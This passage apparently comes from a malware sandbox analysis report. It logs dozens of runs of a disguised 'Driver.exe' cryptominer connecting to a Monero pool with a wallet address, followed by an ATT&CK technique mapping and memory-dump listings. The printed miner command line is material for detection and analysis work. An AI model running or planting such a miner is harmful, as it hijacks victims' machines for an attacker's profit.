    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1588
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:988
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:2044
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:764
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:524
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1796
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1972
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1292
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:748
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1164
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1748
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1552
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1496
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:816
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1936
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1984
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:1540
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:984
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    - Executes dropped EXE
    PID:856
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:1316
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:1392
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:1988
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:1400
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:1644
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:916
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:1584
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:688
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:1352
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:2000
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:1492
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:624
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:1820
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:1792
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:1960
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:1724
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:1984
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:764
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:1644
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:888
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:1552
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:1620
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:576
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:1564
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:624
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:1500
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:1984
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:1292
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:960
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:1448
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:560
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:2000
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:1320
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:304
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:1620
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:1204
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:856
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:1588
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:988
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:1644
- - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 4942FTmVN9Hjp8FJQ9ioQy7aMJatBJ8obBpiu5LrtPescwK7dmbbXofGs8m6LZasguiDYmiAA37UUhdrZ9bdy3ZG6qWxVma -p x -k -v=0 --donate-level=0 -t 1
    3⤵
    PID:1496

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1408-57-0x0000000075C51000-0x0000000075C53000-memory.dmp

Filesize
8KB

Download
memory/1408-58-0x00000000003C0000-0x00000000003C1000-memory.dmp

Filesize
4KB

Download
memory/1408-59-0x0000000004620000-0x0000000004621000-memory.dmp

Filesize
4KB

Download
memory/1408-55-0x00000000008C0000-0x00000000008C1000-memory.dmp

Filesize
4KB

Download
memory/1700-64-0x0000000000030000-0x0000000000031000-memory.dmp

Filesize
4KB

Download
memory/1700-67-0x0000000004CD0000-0x0000000004CD1000-memory.dmp

Filesize
4KB

Download
memory/1864-71-0x00000000001F0000-0x0000000000204000-memory.dmp

Filesize
80KB

Download